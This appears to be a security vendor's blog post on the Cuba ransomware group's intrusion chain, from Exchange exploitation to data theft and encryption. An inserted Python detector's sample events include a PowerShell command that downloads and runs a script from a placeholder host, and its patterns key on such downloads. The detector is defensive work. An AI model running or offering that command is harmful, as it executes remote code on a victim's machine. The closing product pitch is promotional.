Cuba Ransomware Hacked Microsoft Exchange Servers
The Ransomware Operation Is Exploiting Microsoft Exchange Vulnerabilities to Gain Initial Access to Corporate Networks.
Cuba Ransomware was launched in 2019, and since then it has not been particularly active in comparison to other operations, like REvil, Avaddon, Conti, and DoppelPaymer.
As BleepingComputer explained, Mandiant analysts have discovered that the Cuba ransomware operation targets the United States first and then Canada.
In 2021, Mandiant observed some threat actors that deploy ransomware increasingly shifting to exploiting vulnerabilities as an initial infection vector. UNC2596, a threat actor that deploys COLDDRAW ransomware, publicly known as Cuba Ransomware, exemplifies this trend. While public reporting has highlighted CHANITOR campaigns as a precursor to these ransomware incidents, Mandiant has also identified the exploitation of Microsoft Exchange vulnerabilities, including ProxyShell and ProxyLogon, as another access point leveraged by UNC2596, likely as early as August 2021. The content of this blog focuses on UNC2596 activity which has led to the deployment of COLDDRAW ransomware.
UNC2596 is currently the only threat actor tracked by Mandiant that uses COLDDRAW ransomware, which may suggest it’s exclusively used by the group. During intrusions, these threat actors have used webshells to load the TERMITE in-memory dropper with subsequent activity involving multiple backdoors and built-in Windows utilities. Beyond commonplace tools, like Cobalt Strike BEACON and NetSupport, UNC2596 has used novel malware, including BURNTCIGAR to disable endpoint protection, WEDGECUT to enumerate active hosts, and the BUGHATCH custom downloader. In incidents where COLDDRAW was deployed, UNC2596 used a multi-faceted extortion model where data is stolen and leaked on the group’s shaming website, in addition to encryption using COLDDRAW ransomware. COLDDRAW operations have impacted dozens of organizations across more than ten countries, including those within critical infrastructure.
Planting backdoors such as Cobalt Strike or the NetSupport Manager remote access tool is one method used by the group, but they also use their own tools: “Bughatch,” “Wedgecut” (delivered as “check.exe”), and “Burntcigar.”
Wedgecut is delivered as an executable called “check.exe.” It is a reconnaissance tool that enumerates Active Directory using PowerShell.
Bughatch is a downloader that fetches PowerShell scripts and files from the C&C server. To evade detection, it loads in memory from a remote URL.
Burntcigar exploits a vulnerability in an Avast driver that is bundled with the tool, a “bring your own vulnerable driver” (BYOVD) attack used to disable endpoint protection.
Finally, there’s Termite, a memory-only dropper that fetches the payloads listed above and loads them into memory. However, this tool has been identified in operations run by a variety of threat groups, indicating that it is not used solely by the Cuba ransomware actors.
The threat actors escalate privileges using stolen account credentials obtained with the widely available Mimikatz and Wicker tools.
The next stage is Bughatch, which is loaded by Termite and followed by Burntcigar, which prepares the ground for data exfiltration and file encryption by deactivating security tools on the target system.
The Cuba ransomware group doesn’t use any cloud services for the exfiltration step but instead sends everything to their own private infrastructure.
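The intrusion chain described above (Exchange webshell, check.exe driving PowerShell AD enumeration, Bughatch fetching scripts from a remote URL, and a BYOVD driver load) can be turned into simple endpoint-telemetry checks. The following is an added example written for this post, not code from Heimdal or Mandiant; the Sysmon-style field names, the sample command lines, and the driver path are constructed assumptions, since the post names no driver file or command.

```python
# Heuristic detector for the Cuba/UNC2596 behaviours described in the post,
# run over constructed Sysmon-style process-creation and driver-load records.
from dataclasses import dataclass

# w3wp.exe is the IIS worker process that hosts Exchange's web front ends;
# a shell spawned from it is the classic sign of a webshell.
WEB_WORKERS = {"w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
WEDGECUT_NAME = "check.exe"   # executable name the post gives for Wedgecut
# Legitimate drivers normally live here; BYOVD drops a signed but
# vulnerable driver somewhere else (assumed heuristic, not from the post).
TRUSTED_DRIVER_DIRS = ("c:\\windows\\system32\\drivers\\",)

@dataclass
class Event:
    kind: str            # "process" or "driver"
    image: str = ""      # created process image, or loaded driver path
    parent: str = ""     # parent process image (process events only)
    cmdline: str = ""
    signed: bool = True  # driver signature status (driver events only)

def classify(ev: Event) -> list[str]:
    """Return the alert tags raised by one event (empty list if none)."""
    tags = []
    image = ev.image.lower().rsplit("\\", 1)[-1]
    parent = ev.parent.lower().rsplit("\\", 1)[-1]
    cmd = ev.cmdline.lower()
    if ev.kind == "process":
        if parent in WEB_WORKERS and image in SHELLS:
            tags.append("exchange_webshell_child")
        if WEDGECUT_NAME in (image, parent):
            tags.append("wedgecut_recon")
        if image in SHELLS and ("downloadstring" in cmd or "http" in cmd):
            tags.append("remote_script_load")   # Bughatch-style in-memory fetch
    elif ev.kind == "driver":
        if not ev.image.lower().startswith(TRUSTED_DRIVER_DIRS):
            tags.append("driver_from_unusual_path")   # BYOVD candidate
        if not ev.signed:
            tags.append("unsigned_driver")
    return tags

def scan(events):
    """Return (image, tags) for every event that raised at least one tag."""
    return [(ev.image, classify(ev)) for ev in events if classify(ev)]

SAMPLE = [  # constructed records, not real telemetry
    Event("process", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\inetsrv\w3wp.exe", "cmd.exe /c whoami"),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Users\Public\check.exe", "powershell -c Get-ADComputer -Filter *"),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe", "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"),
    Event("driver", r"C:\Users\Public\vendor_driver.sys", signed=True),  # placeholder name; BYOVD drivers carry a valid signature
    Event("process", r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
]
```

Run `scan(SAMPLE)` to see four of the five constructed events flagged; in a real deployment the same checks would be applied to Sysmon Event ID 1 (process creation) and Event ID 6 (driver load) records.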
How Can Heimdal™ Help?
In the fight against ransomware, Heimdal™ Security is offering its customers an outstanding integrated cybersecurity suite including the Ransomware Encryption Protection module, that is universally compatible with any antivirus solution, and is 100% signature-free, ensuring superior detection and remediation of any type of ransomware, whether fileless or file-based (including the most recent ones like LockFile).